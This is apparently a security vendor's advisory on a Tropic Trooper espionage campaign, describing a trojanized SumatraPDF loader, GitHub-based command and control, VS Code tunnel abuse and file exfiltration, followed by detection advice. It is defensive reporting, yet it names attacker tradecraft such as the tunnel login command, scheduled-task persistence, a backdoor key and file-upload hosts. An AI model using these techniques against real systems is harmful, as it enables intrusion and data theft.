Critical Threat Research : The Iranian Cyber War Intensifies!
Comprehensive Threat Exposure Management Platform
The China-linked Tropic Trooper APT group (also tracked as APT23, Earth Centaur, KeyBoy, and Pirate Panda) has significantly evolved its tactics, techniques, and procedures by shifting to open-source offensive frameworks in a sophisticated multi-stage intrusion campaign first observed in March 2026. The Tropic Trooper campaign targeted Chinese-speaking individuals in Taiwan, South Korea, Japan, Philippines, and Hong Kong, focusing on government institutions, military/navy agencies, hospitals, banks, transportation, high-tech, and healthcare sectors across Windows platforms.
The Tropic Trooper attack chain begins with ZIP archives containing military-themed document lures alongside a trojanized SumatraPDF reader that silently deploys the TOSHIS loader malware. The TOSHIS loader fetches encrypted shellcode from Tropic Trooper staging servers and reflectively loads an AdaptixC2 Beacon agent that routes command-and-control traffic through GitHub Issues and repository contents. On high-value targets, Tropic Trooper operators deploy Microsoft Visual Studio Code and establish VS Code tunnels for interactive remote access, representing a significant shift toward abusing legitimate developer tools.
The Tropic Trooper staging infrastructure also hosted Cobalt Strike Beacon bearing the distinctive watermark 520 and the EntryShell custom backdoor using the AES-128 ECB key “afkngaikfaf,” both long-standing hallmarks of Tropic Trooper tradecraft. This evolution demonstrates Tropic Trooper’s strategic pivot to open-source offensive frameworks including AdaptixC2, Visual Studio Code tunnels, and GitHub-based command-and-control infrastructure, making detection more challenging for security teams defending against this China-linked APT group.
Initial Spear-Phishing and Trojanized SumatraPDF Delivery
The China-linked Tropic Trooper APT group launched a sophisticated spear-phishing campaign targeting Chinese-speaking individuals across Taiwan, South Korea, Japan, Philippines, and Hong Kong. The Tropic Trooper intrusion begins with a ZIP archive delivered to targets that contains a blend of outdated decoy documents alongside one file engineered to lure execution. The weaponized component is an executable — a trojanized copy of the open-source SumatraPDF reader that preserves the legitimate certificate and PDB path but carries an invalidated digital signature.
Execution of the Tropic Trooper payload requires user interaction, consistent with Tropic Trooper’s long-standing preference for socially engineered spearphishing attachments and fake installer files. This Tropic Trooper technique has been documented across the group’s campaigns targeting Taiwan, the Philippines, Hong Kong, and earlier air-gapped military and government environments reached through USBferry infections, demonstrating the continuity of Tropic Trooper’s initial access methods.
TOSHIS Loader and AdaptixC2 Beacon Deployment
Once the trojanized SumatraPDF is launched, the Tropic Trooper malware hijacks its own control flow by redirecting function into malicious code, a departure from earlier TOSHIS variants that modified the executable entry point directly. The TOSHIS loader constructs stack strings containing the command-and-control address, a destination path for the decoy file, DLL names, and a cryptographic key, then resolves Windows APIs dynamically using Adler-32 hashes to evade detection.
The TOSHIS loader downloads a decoy AUKUS-themed PDF via ShellExecuteW to distract the victim while pulling a second-stage shellcode from the same Tropic Trooper staging IP, decrypting it in memory. The decrypted shellcode is an AdaptixC2 Beacon agent that is reflectively loaded into the running process. Tropic Trooper establishes persistence through scheduled tasks created with schtasks /create using names crafted to blend with legitimate services, with triggers configured to run the AdaptixC2 agent on an hourly cadence at the highest run level.
Visual Studio Code Tunnels and Hands-On-Keyboard Operations
After the AdaptixC2 Beacon establishes itself, the Tropic Trooper operators move into a reconnaissance and hands-on-keyboard phase. The Tropic Trooper agent first queries ipinfo.io to learn its external IP before beaconing out through a custom listener that communicates with the threat-actor-controlled GitHub repository. This represents a significant evolution in Tropic Trooper command-and-control infrastructure, abusing GitHub’s legitimate API for malicious communications.
When a victim is assessed as valuable, the Tropic Trooper operators download the Visual Studio Code command-line binary from Microsoft’s CDN and invoke “code tunnel user login –provider github”, redirecting the device-login output to z.txt to complete authentication and establish an interactive VS Code tunnel for hands-on access. On some hosts, the Tropic Trooper operators additionally install trojanized alternatives such as SunloginDesktopAgent.exe to better camouflage their footprint, and they have been observed staging Roslyn, the open-source .NET compiler, for trusted-developer-utility proxy execution of malicious code.
Data Exfiltration and Attribution to Tropic Trooper
For collection and exfiltration, the Tropic Trooper AdaptixC2 Beacon uses its native fileupload capability to pull arbitrary files from the compromised host and channels all outbound data through the same GitHub API surface used for command delivery. Output is Base64-encoded by Tropic Trooper, split into 30-megabyte parts when necessary, and written as individual files under the repository’s contents tree. Operational security is tight: Tropic Trooper Beacons are deleted within roughly ten seconds of upload to destroy the session keys and prevent passive decryption of captured traffic.
The same Tropic Trooper staging server that hosts the AdaptixC2 shellcode was also observed serving a Cobalt Strike Beacon marked with the watermark 520 and an EntryShell custom backdoor using the AES-128 ECB key “afkngaikfaf,” both of which align with previously documented Tropic Trooper tooling and cement the attribution to this China-linked APT group targeting government, military, healthcare, and financial institutions across East Asia.
Detect Trojanized SumatraPDF and Invalid Code Signatures
Deploy endpoint detection rules that flag SumatraPDF-named binaries whose Authenticode signature is present but cryptographically invalid, and match the file hashes listed in the IoC section of this Tropic Trooper threat advisory. Consider blocking unsigned or revoked-signature executables from executing out of user profile, Downloads, and Temp directories to prevent Tropic Trooper initial access through trojanized applications.
Monitor GitHub API Egress for Beaconing Behavior
Inspect HTTPS traffic to api.github.com for process origins that do not correspond to sanctioned developer tooling or CI agents, especially POSTs to /repos/ /issues, PUTs to /repos/ /contents, and repeated polling of issues?state=open. Establish a baseline of legitimate GitHub usage per endpoint and alert on deviations, including uploads of base64 blobs larger than a few megabytes, which are indicators of Tropic Trooper AdaptixC2 Beacon exfiltration activity.
Restrict and Audit Visual Studio Code Tunnel Usage
Tropic Trooper weaponizes the legitimate VS Code tunnel feature for interactive remote access. Where VS Code tunnels are not required, block the code.exe CLI from invoking the tunnel command, strip the VS Code CLI binary from standard endpoint images, and alert on any process tree that writes device-login output to files such as z.txt, z2.txt, or files in C:\Users\Public\Documents. Require SSO-enforced GitHub accounts that cannot be authorized from unmanaged devices to prevent Tropic Trooper abuse of VS Code tunnels.
Monitor Suspicious Ingress Tool Transfer
Build detections for cURL invocations downloading from code.visualstudio.com, bashupload[.]app, or any IP-literal HTTP source into user-profile or Public directories, and for mass renaming of downloaded archives to short names such as v.zip. Correlate with Microsoft Defender or AMSI alerts on subsequent shellcode activity to identify Tropic Trooper tool staging and deployment across compromised endpoints.
Resource Development
Initial Access
Execution
Persistence
Defense Evasion
Discovery
Collection
Command and Control
Exfiltration
IPv4 Addresses
Domains
URLs
SHA256 Hashes
Get through updates and upcoming events, and more directly in your inbox